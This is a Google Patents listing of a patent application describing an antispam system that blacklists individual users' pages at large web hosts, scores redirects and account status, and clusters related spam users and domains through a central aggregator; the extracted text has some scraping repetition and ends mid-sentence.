WO2007076714A1 - System and method for generalizing an antispam blacklist - Google Patents

System and method for generalizing an antispam blacklist Download PDF

Info

Publication number
WO2007076714A1
WO2007076714A1 PCT/CN2006/003727 CN2006003727W WO2007076714A1 WO 2007076714 A1 WO2007076714 A1 WO 2007076714A1 CN 2006003727 W CN2006003727 W CN 2006003727W WO 2007076714 A1 WO2007076714 A1 WO 2007076714A1
Authority
WO
WIPO (PCT)
Prior art keywords
user
pages
users
web
agg
Prior art date
Application number
PCT/CN2006/003727
Other languages
French (fr)
Other versions
WO2007076714A8 (en
Inventor
Marvin Shannon
Wesley Boudeville
Original Assignee
Metaswarm (Hongkong) Ltd.
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Metaswarm (Hongkong) Ltd. filed Critical Metaswarm (Hongkong) Ltd.
Publication of WO2007076714A1 publication Critical patent/WO2007076714A1/en
Publication of WO2007076714A8 publication Critical patent/WO2007076714A8/en

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00Network arrangements or protocols for supporting network services or applications
    • H04L67/01Protocols
    • H04L67/02Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F16/00Information retrieval; Database structures therefor; File system structures therefor
    • G06F16/90Details of database functions independent of the retrieved data types
    • G06F16/95Retrieval from the web
    • G06F16/958Organisation or management of web site content, e.g. publishing, maintaining pages or automatic linking
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L51/00User-to-user messaging in packet-switching networks, transmitted according to store-and-forward or real-time protocols, e.g. e-mail
    • H04L51/21Monitoring or handling of messages
    • H04L51/212Monitoring or handling of messages using filtering or selective blocking
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/02Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
    • H04L63/0227Filtering policies
    • H04L63/0245Filtering by information in the payload
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • H04L63/1483Countermeasures against malicious traffic service impersonation, e.g. phishing, pharming or web spoofing
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • H04L63/1491Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00Network arrangements or protocols for supporting network services or applications
    • H04L67/2866Architectures; Arrangements
    • H04L67/30Profiles
    • H04L67/306User profiles

Definitions

  • This invention relates generally to information delivery and management in a computer network. More particularly, the invention relates to techniques for automatically classifying electronic communications as bulk versus non-bulk and categorizing the same.
  • a spammer could try to avoid a blacklist of domains by using a large web hosting site to hold her pages. She sends out spam with links to these pages. An ISP might hesitate in blocking all messages linking to that prominent site.
  • the Web Service can also offer other information about the user, which can be used by antispam and antiphishing methods.
  • the concept of web pages at a hosting site belonging to a given user can be applied by a search engine to improve its classification and rankings of those pages and pages that they link to, or that link to it.
  • Fig.1 shows a web page host (WH), a central web site (Agg), and a browser. It indicates how WH publishes a mapping f() to the Agg, which then makes it available to a browser, when the browser is visiting WH.
  • base domain So for example, an address like http://ape.bear.com/bin/testO would give a base domain ofbear.com.
  • a domain like mike.joe.toml55.net.au would give a base domain of toml 55.net.au. It can be seen that a base domain is a reduction in the number of fields in the domain to some minimal set of fields on the right hand side. Sometimes this is two, as in bear.com, sometimes it is three, as in tom.155.net.au.
  • D be a domain that we are reducing to a base domain. Assume D ends in the same country TLD that S is associated with. If the second field from the right in D is in S, then the base domain will have 3 fields, and we reduce D accordingly. Otherwise, D hangs directly off the country TLD, so its base domain is 2 fields, and we reduce it to this subset.
  • H The size of H is a key advantage. While there might be a degree of subjectivity in adding a site to H, we can restrict H's size to some relatively small number. Probably less than 100. This is crucial, because a typical URL lets the information in its path, which is to the right of the domain, be interpreted in essentially an arbitrary manner by the web server at that domain. Let G be that path in the URL.
  • G a logical and simple example of G might be symbolically written as username + /dir 1/dir 2/.../dir n/fileO where dir 1, dir 2, ..., dir n refer to a directory structure written by the customer, in which her file, here shown as fileO, exists. (The above could also have arguments to the right of fileO.)
  • dir 1, dir 2, ..., dir n refer to a directory structure written by the customer, in which her file, here shown as fileO, exists.
  • fileO her file
  • f() A second way to find f() is for the website to publish it as a Web Service. Where the latter is usually written in XML. f() might contain instructions written in a computer language like C or C++, or even in a language like XSLT. So that we could access this Web Service, get f() and run it easily on our machines.
  • f() returns not just a single string representing the user, but also other data. These include, but are not limited to the following items:
  • PAID the user has a paid account.
  • VERIFIED the user has a paid account and the user's identity has been verified by some means.
  • any page with links computes one or more addresses dynamically, instead of using simple static addresses. This applies the idea in "1698", that a spammer could use this to try to avoid detection by a blacklist.
  • links these can be the usual outgoing links, or incoming links (like loading an image).
  • destination we include the case of the destination that is used when an HTML "submit” button (or its functional equivalent in any other hypertext language) is pressed. This action is usually done when the user has typed information into a form on that page, and then wants to upload it.
  • Some of the above information could be found by spidering a user's pages. Like the number of pages, for instance. But having the information readily available is more efficient in terms of network traffic and computation. Both at the ISP and at the web host. Because if the ISP has to do a full spidering of the pages, then this also involves more effect by the web host's server.
  • the ISP can use the above information to help classify the messages pointing to the user's pages.
  • Our methods from the Antispam Provisionals involve the finding of a Bulk Message Envelope (BME). These objectively can find the BMEs with the most messages. There remains the question of whether such a BME, though it has many messages, is to be considered "good” bulk or "bad” bulk. (Good bulk might be newsletters that recipients subscribe to.)
  • the above information can be used as extra "styles” ["1174"] or heuristics to help in this determination. For example, if the user has a verified account, then the messages linking to her pages might be more likely to be good bulk than bad, compared to a user just having a paid or free acount, other factors being equal.
  • WH be a web host, with website wh.com. Why should it provide the above information? If it is serious about not tolerating spam, then it might be amenable.
  • the above lets message providers give it feedback with assessments of its users. For example, if an ISP made a decision that a given user at WH is a spammer, it might communicate this to WH. To optimize bandwidth, the ISP might batch these results. Then it could periodically upload to WH a list of WH' s users, as seen in the ISP's incoming messages. Next to each username could be information like the total number of messages seen with links to that user, and the number of these messages that the ISP considered to the spam. Where implicitly, if there is a difference between these two numbers, then those other messages were not considered to be spam.
  • WH telling the ISP about the complaints received by it about Zoltan's pages could be an infringement of Zoltan's privacy. But the complaints might be regarded as negative votes on those pages. Akin to Amazon Corp.'s website, where you can read a review of a book, and see how many positive or negative votes that review got. The comparison is especially appropriate since the reviews are on publicly accessible pages, and typically so too are most of the pages at WH. Plus, WH could in general modify its Terms of Service with its users, to expressly permit the above furnishing of information to third parties like ISPs.
  • WH might also offer on its web pages or via a Web Service, a means of searching its users, using constraints on the above variables as search criteria. For example, it could return links to those users whose free or paid accounts have existed for more than 60 days,
  • a merit of our method is that it attacks a technique by a spammer who opens an account at WH and writes pages, and who then injects spam into the network by various means, whose only connection to WH are in the enclosed links.
  • the spammer takes advantage of the fact that WH and the ISP currently each only sees its own situation.
  • WH could have a Web Service that tells whether a user has a free, paid or verified account. Instead, or in addition, WH could also encode this in the URLs of a user's pages. So Zoltan has a free account, his base URL might be http://wh.com/free/Zoltan, while if Mary has a paid account, her base URL might be http://wh.com/paid/Mary. In doing this, it could reduce the bandwidth requirements on WH's Web Service, since the latter now need not furnish such information. But another advantage of this is that it is analogous to our Notphish tag in "2528", if several web hosts use an agreed upon encoding, whose meaning can in turn be used at ISPs.
  • Zoltan is a spammer, with his base URL given above. He cannot change this URL, even if he would prefer a "paid” or “verified” in it. Because in general, there will be no pages at that URL, if he does so. Which means no clickthrough is possible in that link in his messages. Or even, if by coincidence, there is a j http://wh.com/paid/Zoltan, this is to a different person's pages, and not to whatever "our" Zoltan is selling.
  • WH Whether or not WH writes user information into the URLs, it can also publish a set of what we term "base labels". These labels mean that if a URL has a path that begins with one of these base labels, then it refers to a page published directly by WH itself, as opposed to its users. Imagine for example that the base labels are ⁇ info, home, help ⁇ . These demarcate directories of pages that are not written by the users. The base labels might be published as a Web Service and in a web page. It lets third parties programmatically distinguish between WH and its users.
  • the presence of the labels for a user's status, in the URL also lets these be used in antispam measures, that operate on messages containing the URLs.
  • the measures might be performed at the message provider that receives the messages, or in the recipient's computer, as a client side filtering of spam.
  • the user status in the URL can be used as an extra heuristic in assessing the message containing the URL.
  • the recipient might even have a policy that such a message, that points to a good web hosting site, might go into her bulk folder if it is from a free user, while if it is from a paid or verified user, it might go into her inbox.
  • both cases might be overridden by other filtering steps, like if the sender is in her whitelist, then the message goes into her inbox, even if it points to a free user's URL. Or if the message also has a link with a domain in a blacklist, then the message might go into the bulk folder, even if another link points to a verified user's URL at WH.
  • the interplay between the filtering rules might be complex. But the point is that knowledge of the user status gives us another handle on fighting spam.
  • the antispam steps in the previous paragraph might also be possible even if WH does not write the status of the user into the URL. If WH does publish a Web Service with this information, then a message provider can ask it for that information, and do the other steps suggested in the paragraph. This might also be possible at the recipient's computer, if her mail reading software accesses WH's Web Service.
  • styles can be defined if the page has a redirect.
  • the redirect might be done via a META refresh tag.
  • server side actions like a CGI script or Java that runs on the server.
  • the ISP or other external party could load the page and detect the META refresh tag or JavaScript that would run in a browser.
  • server side actions the ISP might choose to simulate a browser, to find the destination that the actions redirect to.
  • Some web hosting sites might prevent their users from using some of the above mechanisms. For example, WH might restrict its users to writing HTML.
  • redirect mechanisms might vary, and new ones might emerge over time, the intent here is to detect a redirection, and not how that is achieved. The detection is not expected to be difficult, though below we discuss how the destination might possibly be obscured.
  • a redirect is important because unlike clicking on a link, it does not involve the browser user's active intervention. This is sometimes used by a spammer, to take the visitor away from the URL that ends at WH, to the spammer's actual website. Or perhaps to another website with another redirect et cetera; ultimately ending up at the true spammer's website.
  • the presence of a redirect in any of a user's pages could set a Boolean style. Or the style might be an integer that counts up the number of the user's pages that have redirects. Or it could be a fraction that normalizes this number with respect to the total number of user's pages. An important special case of the latter is where there is only one page for the user, and it redirects. This might be considered a special and potentially suspicious style.
  • a redirect stays within wh.com. If it goes to a different user, then this might set a Boolean style, as contrasted to a redirect that stays within the user's files. Why might this be significant? There are at least two possible reasons. Firstly, the spammer might set up a main account, that has various pages (and perhaps code as well) selling some item. Then, she might set up other accounts, which redirect to the main account. The URLs of the former accounts are promulgated in spam. So if these are blacklisted, her main account might not be. The blacklisting might involve either a simple use of the domain+path, or a resolving down to the base domain + user name, as described in Section 6. And there is less effort for her compared to setting up the full pages on all her accounts.
  • the anchor text (“Cheap Meds”) is visible when the recipient views the spam in a program like a browser that can show HTML. Now when she moves her mouse over the link, the bottom of the browser will show the URL. But some users ignore this. If she clicks on the link, it takes her to that URL. An immediate redirect happens, to http://wh.com/paid/Nick. This URL appears in the address bar at the top of the browser, and is far more prominent than a link transiently displayed at the bottom. So the recipient sees a page in a paid account.
  • a Boolean style could be set. Or an integer style that counts the number of such destinations in the chain.
  • the styles could also be associated with the destination domains. Giving extra information to help classify those domains.
  • redirect styles There might be other redirect styles specific to a site. Like, does the site let a user write a redirect? If so, can she redirect outside the site? If so, does the site filter these redirects against a blacklist? So that an attempt by a user to write a page with such a redirect is rejected, and the page never appears on the Web. Does the site also filter redirects against a whitelist?
  • the site can use the ideas in "1698" to run master-slave threads that call the routine, in order to find the address.
  • the slave does the computation, but the master will terminate the slave if it does not end within some given time.
  • This avoids the possibility that a spammer submits a page with a routine that deliberately takes a long (or infinite) time. She is trying to stop the site from scrutinizing the dynamic addressing. So that even though that particular account of hers might be deleted because of this, the long run time endured by the site to find this out is meant to deter the site from doing this as a general practice, letting her make another account with dynamic addressing. Our method in "1698" avoids this trap.
  • An external entity like an ISP, or even a browser can also apply this anti-dynamic addressing method against a redirect, if the routine exists in code that is downloaded to a browser.
  • These styles or policies can also be used as additional criteria for determining if a given web hosting site will be admitted to the set of good sites, H, or kept in it.
  • wh.com is not put into a blacklist. But we might instead put wh.com/Zoltan into the blacklist.
  • templating occurs. Where when we reduce a message to its canonical form and make hashes, we find that it is an instance of an existing BME. But the current message has a base domain from a link that is not in the BME's list of domains. We call it templating because the spammer is using a base version of the message as a template, and inserting different domains into the links. Now, we can also look to see if the spammer is using different user accounts at a given web host, or maybe different accounts at different web hosts, based on messages received by us. Plus, we can also spider the various links, and apply our canonical steps to the web pages pointed to, out to some n-ball in link space.
  • Agg Aggregation Center
  • the Agg can also be used in this Invention. Earlier, we described how an ISP could decide the composition of a list, H, of major web hosts. It would then obtain f() from each web host. An alternative is for the Agg to do these tasks, and then furnish this to its customer ISPs. (Or, an antispam vendor might furnish the equivalent software and data to ISPs.)
  • the Agg is well suited to maintain H and its associated information. For example, complaints by ISPs about users in a given company in H might be amassed by the Agg and then forwarded to that company. This could be useful from the company's vantage. Because instead of dealing with many ISPs, and perhaps wondering if some might have been subverted and are then sending it spurious complaints, it delegates to the Agg the problem of filtering the complaints.
  • the maintenance could include deciding what web hosts will be in H, and whether to keep a given host in H. For the latter host, suppose it is WH. The situation might arise if WH takes too long to respond to complaints from the Agg about its users. What "too long" means might be defined by the Agg. So that a web host which is put into H might agree to respond within this time, as part of the condition for it to belong in H. It should be appreciated that there is value for WH to be in a widely used H.
  • the Agg might compute various metrics about each host in H. Like the number of complaints it gets from its ISPs about each host's users. Or the number of each host's users that are complained out. Or the average time between the Agg complaining to a host about one of its users and that user being taken offline. Also, if a host furnishes status information about its users, like whether they are free, paid or verified, then the Agg can total up complaints for users in each category. So that, for example, if WH has many verified users that are complained about, it suggests that WH's verification methods might need improvement.
  • the Agg can act as a known, trusted intermediary, standing between the web hosts of H and ISPs and other message providers.
  • H is expected to be of small size. In part, because if each ISP has to maintain its own, a small H is less effort. However, if Agg maintains H, then it may be cost effective for it to have a larger H, since it can essentially amortize this effort over a base of many ISPs.
  • the Agg can offer a service to the web hosts in H. It can certify that a given web host is in H. So that the Agg is attesting that members of H perhaps follow certain good practises, where these might be defined by the Agg, as a prerequisite for membership (and continued membership) in H. So it might offer WH an image that WH could show on some of these pages, where this image is a "seal" attesting to validation by the Agg.
  • the seal might also be clickable, going to Agg's website, where data is then shown about WH's qualifications. However, while this could be done, it is well known that seals have disadvantages. They can be copied by spammers. And if a real seal is clickable, so too might the fake seal.
  • the fake either goes to another spam page, or even to the Agg's website. In either case, the spammer hopes that most users will not bother to click the fake seal.
  • the Agg can offer a stronger measure.
  • the extension could validate that a given web site which the browser is at, is actually in H. Plus, if it finds links to the validation pages at Agg, at pages not in H, then the browser could indicate this to its user, perhaps by a visual cue that says the page is a fake.
  • the Agg can also offer a service to users at web hosts. By various means, it might offer some validation of a user's identity or reputation, possibly in conjunction with a validation of the user's web pages.
  • Jane at WH, with her web pages beginning with http://wh.com/jane/. In those pages, Jane could have a tag that points to the Agg. So that a visitor can ask the Agg what it vouches for her. Plus, in her URLs, there might be the equivalent information, encoded in some fashion.
  • WH controls the format of URLs pointing to its pages, and it could permit this encoding. Hence, even if WH were not to offer the information about Jane described in Section 3, this encoding would let her offer others some assurance about her and her web pages.
  • the unvalid is the default, for a user that has not been validated, and who does not have "bad" pages which might cause it to be invalid, in the Agg's assessment.
  • the validation of a user need not be confined to users with pages in H.
  • the Agg might refuse to validate any users on a website, if that site fails to meet standards imposed by the Agg. This acts against a minor web hosting site being conducive to spammers. Where a spammer might deliberately want to set up several "users" with benign pages, and get these validated by the Agg. To try to enhance the overall reputation of the site, and then proceed to issue spam linking to other users at the site.
  • the Agg when validating one user's pages, the Agg might offer the user a validation seal to put in her pages. This might (or perhaps should) be clickable, reaching to the Agg. Whereupon, there might be an Agg page with information about the user. Plus, if the browser has the above extension, then it might validate the user's pages in a manner that is external to the pages.
  • Agg For both a website and a user, there could be different levels of validation offered by the Agg. There might be a strictly algorithmic validation. Then there could be a higher level of validation, which performs the previous validation and also involves some manual steps on the part of the Agg's employees and possibly also of the website's employees or of the user. The Agg could impose a higher fee for the latter validation, compared to the former.
  • a user might have accounts on several hosting sites, and the Agg could offer to validate these, all under the rubric of the same user.
  • the Agg could have some steps to verify that the same person controls these accounts.
  • the Agg validating a user or website might be useful to either. For example, a validated user might be able to obtain a higher commission for clickable ads that are placed in her pages. Perhaps on the probability that her pages are more likely to be credible. Or messages linking to her pages might be less likely to be treated as spam by various antispam methods that can identify that she is validated.
  • the Agg were to invalidate a user or website, then this might be for two reasons. One is if the certification is paid for by the user or website, and the period for which this is valid has expired, and no payment has been received for another period. Another reason could be that through its analysis of the pages, or from external input, the Agg finds that the user or website should not be validated. The first reason might be considered more benign than the second.
  • the Agg might inform her website/s.
  • the Agg might search its data for other users with pages canonically identical to the now invalid pages, and possibly invalidate those users, and inform their websites. Plus, the Agg might inform various ISPs and message providers that are its customers, updating their blacklists with this new entry for the invalid user.
  • the Agg validates a user that was earlier invalid, then it might inform its ISP customers, suggesting that they remove the user from their blacklists.
  • a search engine could also benefit from the extra information made available by a web hosting site.
  • the engine can access the information from the Web Service of WH. Then for a given web page, the engine knows if the author is a free, paid or verified customer of WH. And possibly the number of complaints made against the page. And how long the account has existed.
  • Each engine has its own methods of ranking pages. This new information might be used to refine the rankings. For example, a page by a paid user might have a slightly higher weighting than a page by a free user, other factors being equal. Or, if WH used labels in its URLs, as suggested above, then the engine could use these.
  • Zoltan has a hierarchy of pages, in various directories and subdirectories of the above URL.
  • the engine spiders these pages and wants to compute weightings.
  • a particular directory, cheapPills/, and its pages are linked to by various pages outside wh.com.
  • the engine might in turn look at the links to those pages and by various computations, use the data to derive a weight for that directory or its pages.
  • this might be what the engine normally does.
  • the engine can also take this to a higher level. Across the users at WH, and across users at other websites, the engine can also search for similarities between users with a same interest. Possibly the engine is already doing this, but only by comparing between pages, or between domains. Our method gives an intermediate level of grouping of pages that may prove to be useful.
  • This "Search Engine Optimization” might involve techniques disapproved of by the engine. Especially if Zoltan is part of a link farm that tries to boost the rankings of pages that it heavily links to. Search engines already have various means of trying to find link farms. In this Invention, by applying the concept of a user and the pages owned by the user, at a web hosting site, we offer another means of finding a farm.
  • Zoltan has a directory, gamble/, linked to from spam. But now his other directory, cheapPills/, has links to directories at other websites. It is functioning as a source of links, within a link farm.
  • the search engine finds out, as above, about the spam links to gamble/. Then, because it has the knowledge of Zoltan as a user, it could use this as a heuristic to be applied against the weightings of cheapPills/ and its files, as a possible member of a link farm. Plus, by following the outgoing links from cheapPills, it can try to trace out other members of the link farm.
  • a link farm that is distributed across several websites, can be considered to be a group of (undesirable) users. To the extent that a link farm has members on a web hosting site, the above showed how it can be searched for, using another ECM space of electronic messaging. In addition, the space of users browsing on the web can also be used.
  • Phi removes all personally identifying aspects in the data. Phi is interested in the aggregate nature of the data, which correlates websites in a manner that might not be discernible from a static view of pages and links.
  • Phi is looking for a mapping f( ⁇ set of URLs ⁇ ) --> spammer, where the latter can be considered to be one bad "user". This might not necessarily be a link farm.
  • An initial group of associated URLs can be investigated using our BME method of "0046".
  • the URLs and pages linked to or from these, or some pages in the same domain as those URLs, might be reduced to BMEs. Then these are compared to see if any are the same or similar across different domains. The sameness or similarity could arise if the same person or group of persons is behind those addresses, and is using boilerplate phrasing on some pages.
  • the URL is to a web hosting site, then the methods of this Invention can be applied to those pages at the site that are from the same user.
  • the engine can act, if it finds out that some of Zoltan's pages are spam. By doing a canonical reduction of most or all of Zoltan's pages, using
  • the engine can see if the non-spam pages are canonically the same (or similar to) pages at other domains. This uses the global scope of the engine's spidering, and assumes that when it records the spidered pages, it does the canonical reduction. In part, to permit such a comparison with new pages. More generally, suppose some of Zoltan's pages are found to be "bad", by any means. (Perhaps they are pointed to by spam, as discussed earlier.) Then the method of the previous paragraph can be applied to the pages. While it is clear why the engine should look for similar bad pages, looking for similar good pages may also reveal associations between domains and pages. These actions force Zoltan to expend more effort at customizing his pages on different websites, or risk them being detected and blacklisted. Increasing the spammer's effort is desirable to both an ISP and a search engine.
  • the 5 on the edge means that there are at least 5 BMEs containing both domains.
  • the cluster was made from an underlying space of users, then the above could be defined as meaning that 5 users have both domains.
  • “have” could mean that we take a user at WH, find its pages and extract domains from links in them.
  • An extension of this method involves possibly determining if there appear to be groupings in the user's pages, based on an analysis of the user's URLs. Does the URL notation suggest a division into directories and subdirectories? It does not have to. But recall that WH is considered to be a major web host. So it is likely to use a simple URL notation, for the benefit of its users. Given this, for a cluster of a user's pages to have two connected domains might involve parameters that indicate the separation between two pages, each with one of those domains, in the user's directory structure. Where the domains might be connected if the pages are separated by less than some metric that measures the "distance" between 2 files in a directory tree. This can also aid in the autoclassification of the directories.
  • the entity (which could be the Agg) making the clusters has access to data from other web hosting sites, then the users that produce the above might be from different sites. Plus, the entity might also add user message data, where these users are recipients or senders of electronic messages, and where the messages might have clickable links, from which domains can be found.
  • finding clusters through the mixing of data from these ECMs, we improve our chances of finding associations, especially those that might be indicative of spam.
  • the entity does not need to have access to the full text of the electronic messages. (So it does not have to be an ISP or message provider.)
  • a key finding in "0046" was that canonically reduced BME data could be exported from a message provider to another organization, without letting the latter have access to the original messages.
  • the clusters are found using the BME data.
  • clusters might be made that do not take all the users in WH. Instead, just the free users, or just the paid users, or just the verified users might be taken as the input to finding clusters. Or we might make clusters from user accounts that have existed for less than 30 days. Likewise, we can do these steps across different web hosting sites. So we can investigate if there are any distinctive differences between these groups of users. Perhaps free users are more likely to be spammers on some web hosts?
  • clusters to be found from users confined to one web host. Then these are compared to those clusters found from other web hosts.
  • user data from message providers might or might not also be used, when finding clusters.
  • each hash is represented as a hexadecimal string.
  • the 7' means that there are 7 users, each with both hashes. When we say a user has both hashes, this could be taken to mean that the user's pages have been canonically reduced "0046", and a set of hashes made for each page.
  • the hashes might be required to be from the same page. Or, more generally, from different pages of the same user.
  • the users might be from one web hosting site, or from several. And data might optionally be introduced from messages sent or received by message providers. Also, hash clusters might be made with users restricted to the free, paid or verified categories.
  • Incoming links could also be used.
  • HTML these might be when a page is loading an image from a URL that points to another user's page or asset.
  • infonnation in redirects might also be used, if these go from one user to another. This method looks for explicit connections and can help show users that are prominent sources (many outgoing edges) or sinks (many incoming edges). Hence, these might be put under further scrutiny.
  • Another method is to derive user clusters from an underlying space of BMEs. We might find two nodes connected like this -
  • the 8 means that there are 8 BMEs in present in both Janet and Zoltan's sets of BMEs, where these sets are derived by canonical reduction of their web pages. Clicking on the 8 brings up a list of the common BMEs, from which the investigator can find more details.
  • WH makes available extra data about the users, that was discussed in Section 3, then more analysis options emerge. For example, the building of user clusters might be also have some graphical display of when the user accounts were made. Or the users might be restricted to those made in some time interval. This searches for temporal correlations. Since if a spammer makes several accounts, she is likely to do so over a short time interval. If she increases this interval, then it takes longer for her to set up to issue spam pointing to these users. We look for characteristics that are inherently hard for her to obscure.
  • Another example could be the making of clusters from users with less than some number of pages. And then comparing these clusters to those from users with pages greater than or equal to that number.
  • BMEs made from electronic messages.
  • the user information might be about the case where the user is the recipient or where the user is the sender, where, in general, these are different from the users who have pages at the hosting sites.
  • user cluster we mean the latter users.
  • message A has a link to an URL of a file owned by Janet
  • message B has a link to an URL of a file owned by Zoltan.
  • both messages produce the same BME.
  • links are removed from the message, before hashing is done.
  • the second approach complements the first. It can be used to find associations between users that have no explicit connection between them.
  • domain and user clusters Given the making of domain and user clusters, these can be used if the Agg finds a user to be invalid. Then, the domains or other users that it links to in the clusters can be scrutinized, to see if these might be invalid. Care has to be taken, because the spammer might deliberately put in links to innocent sites, as a countermeasure. Also, the Agg can look at domains and users that link to the invalidated user. This may be more suspect than outgoing links from the latter. The countermeasure done by the spammer for outgoing links could typically be to well known websites. But for incoming links, who knows about that account? Often, it would be an obscure account.
  • style clusters along the lines of ⁇ 1745.
  • style information could (and probably should) be used in several of the above suggested analyses. For example, when making a user cluster, the styles of users within the same cluster could be compared. Styles that occur frequently amongst many users in a cluster might be used to characterize the entire cluster. Or, styles that occur only in a subset of the cluster might suggest a natural subdivision of the cluster. Also, if styles are found for entire clusters, then this gives a means of comparing clusters, and a basis for classifying clusters.
  • phishing needs a faster response.
  • the Agg might contact WH, as soon as the Agg has verified that indeed a browser has detected a phishing message with a link to, say, http://wh.com/free/Zoltan.
  • WH could do several things. It might immediately shut down Zoltan's pages, to prevent anyone else from being defrauded after this time. Or it might discard any requests for that page, and Zoltan's other pages (if any), but let investigators get the pages. This protects unwary visitors, while possibly letting investigators submit fake personal data that could be used to entrap the phisher. If the pages have outgoing links, these could be followed to see if they lead to the phisher.
  • WH could use our antispam methods of making a BME to see if any pages by its other users are canonically the same or similar to Zoltan's pages. This handles the case where Zoltan has opened several accounts at WH, and is also using those as destinations for phishing.
  • the Agg might make BMEs out of Zoltan's pages, and then see if these are present at other websites in H. It might send these BMEs to those sites, and ask them to check these against their users' pages. Or for some sites, the Agg might do this task.
  • WH might wait some period of time, before making the page publicly available. During this, it could subject the page to various antispam and antiphishing analyses.
  • the Agg would function in an antispam or antiphishing capacity. For example, it might use our Antispam and Antiphishing Provisionals. Especially by making BMEs of the submitted pages, and comparing these to other known BMEs. Here, in an extension of the way we made BMEs in "0046", these BMEs would also include in some manner the URLs that pointed to the pages that went into those BMEs.
  • the Agg is well suited to do this analysis, since it could receive submitted pages from a variety of web hosts. Plus, it would have the expertise to develop and run specialized testing, that even a major web host might not have.
  • WH would expressly permit it to access those pages, while denying general access from the rest of the network.
  • the Agg tests it can be considered to act as a specialized search engine. WH sends it an URL and essentially asks, "Have you seen this before?" and "Is it spam or phishing?". Here, of course, we are referring to the page pointed to by the URL, and not the URL itself. For the first question, the Agg might answer with a count of 0 or greater. Where 0 means no canonical equivalent of the page has been seen before by the Agg. And 1 or greater means it has, and the number is the number of such pages in the BME.
  • the Agg's reply might include URLs of some of those pages, which in general will be at different websites.
  • WH might specify if it wants these other URLs to be of other domains, or of its domain, or both. It might be just interested in matching URLs in its domain, because it controls these URLs, and can decide, for example, if those URLs and the URL that was sent to the Agg, might be taken offline.
  • WH submits a URL, and that page is a new BME to the Agg. It records this BME.
  • WH might be told by the Agg that its first URL's page has now been seen at other locations. So suppose the antispam analysis of the first page said it was inconclusive whether the page was spam or not. If later, WH is told that many copies exist, it may take this as an extra factor in re-evaluating whether the page is spam or not.
  • the Agg might not tell WH whenever every new instance of the page is seen.
  • the Agg or WH might have an agreed upon policy saying that WH be told only every 10 instances, say. Or, furthermore, that once WH has been told for that URL, that it no longer needs to be notified if more instances are seen by the Agg.
  • WH might have a policy of only submitting a subset of URLs to the Agg. For example, it might only do so for free users. Or for free users whose accounts have existed for less than 30 days.
  • the searching for similar BMEs might be something that the Agg does for its own internal analysis. Or perhaps WH might ask for this to be done. Either if no exact match to its URL's page is found, or even if such an exact match is found. If so, then some subset of the similars might be sent to WH. Or the result of some function of those similars. For example, the function might simply to tell WH that some number of similar BMEs or pages were found, across various websites. Here, the number of similar pages would be the sum of the totals of the pages in each of the similar BMEs.
  • a variant on the above idea of using an Agg is that different web hosts peer with each other, in order to exchange and use such information. This follows the idea in "0046" of various message providers exchanging BMEs derived from their message feeds, in order to better see which messages are bulk. There, the use of BMEs was to protect the privacy of the original messages. Here, this is less of an issue, since most of the URLs point to pages that will be or are already publicly available.
  • WH has a user who writes a page that is meant to sit behind a password. So the page is meant to appear only if the visitor has earlier furnished a valid username and password (or maybe just a password). Assume here that WH permits a user to have such pages and the password capability that these imply. For privacy reasons, if an Agg is used, WH might not wish to have it be able to read this page. (Though perhaps it might, according to its Terms of Service with its users.) Then, as in "0046" with messages, WH might have software that makes a BME out of the page, and sends the BME, instead of an URL, to the Agg.
  • the BME might be considered a degenerate BME, inasmuch as it wraps only one page. Then, the Agg looks in its data to see if it has any BME with the same hashes. If so, it replies accordingly to WH.
  • WH allows the immediate publication of its users' pages. But it then also does the above tests, or sends the URLs to the Agg to do so. And later, if a page is found to be spam or phishing, it is taken off the network. With possibly other pages by that user.
  • WH immediately publishes the pages. It wants to know from the Agg, as soon as possible, when these might be spam.
  • the spammer sends out a million messages, pointing to a given page, Rho, and that these messages reach their destinations at the instant that WH publishes Rho.
  • Rho the spammer sends out a million messages, pointing to a given page, Rho, and that these messages reach their destinations at the instant that WH publishes Rho.
  • Rho the spammer sends out a million messages, pointing to a given page, Rho, and that these messages reach their destinations at the instant that WH publishes Rho.
  • Rho the spammer sends out a million messages, pointing to a given page, Rho, and that these messages reach their destinations at the instant that WH publishes Rho.
  • the limiting factor is a combination of these items: Not all the recipients will be currently logged in. Of those that are, not all will immediately read their mail.
  • antispam methods might put the
